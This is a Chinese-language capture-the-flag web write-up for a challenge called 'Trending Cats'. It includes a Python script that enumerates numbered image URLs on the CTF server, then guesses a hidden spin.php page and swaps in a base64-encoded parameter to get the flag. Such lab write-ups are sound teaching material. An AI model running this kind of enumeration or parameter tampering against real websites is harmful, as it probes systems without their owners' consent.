# [CH] Trending Cats ###### tags:`Writeup` `Web` `Chinese` > [name=FlyDragon] ## Step.1 在新分頁中開啟圖片可以發現每個貓貓都有四位數編號  ## Step.2 已知沒有編號 1 的貓咪，利用這點撰寫程式 ```py= import requests NotFound = requests.get(f"http://lotuxctf.com:20003/1.jpg").text found = [] for i in range(6000, 7000): print(i) response = requests.get(f"http://lotuxctf.com:20003/{i}.jpg").text if(response != NotFound): print(f"found at {i}") found.append(i) print(found) ``` 可以找到編號 6166 的 `spin cat`  ## Step.3 根據其他頁面的命名規則推測會有 `spin.php`  ## Step.4 點擊按鈕發現會送出 `cat=aGFwcHk%3D` base64 decode `aGFwcHk%3D --> happy` base64 encode `spin --> c3Bpbg==` --> `spin.php?cat=c3Bpbg==` 得到 flag  {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}